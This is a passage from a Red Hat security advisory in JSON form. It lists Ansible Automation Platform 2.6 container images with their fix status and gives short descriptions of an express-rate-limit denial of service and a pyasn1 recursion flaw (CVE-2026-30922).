"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express-rate-limit: express-rate-limit: Denial of Service for IPv4 clients due to incorrect IPv6 subnet masking"
},
{
"cve": "CVE-2026-30922",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-03-18T04:02:45.401296+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448553"
}
],
"notes": [
{
"category": "description",
"text": "An unbounded recursion flaw has been discovered in the pypi pyasn1 library. This uncontrolled recursion occurs when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: pyasn1 Vulnerable to Denial of Service via Unbounded Recursion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
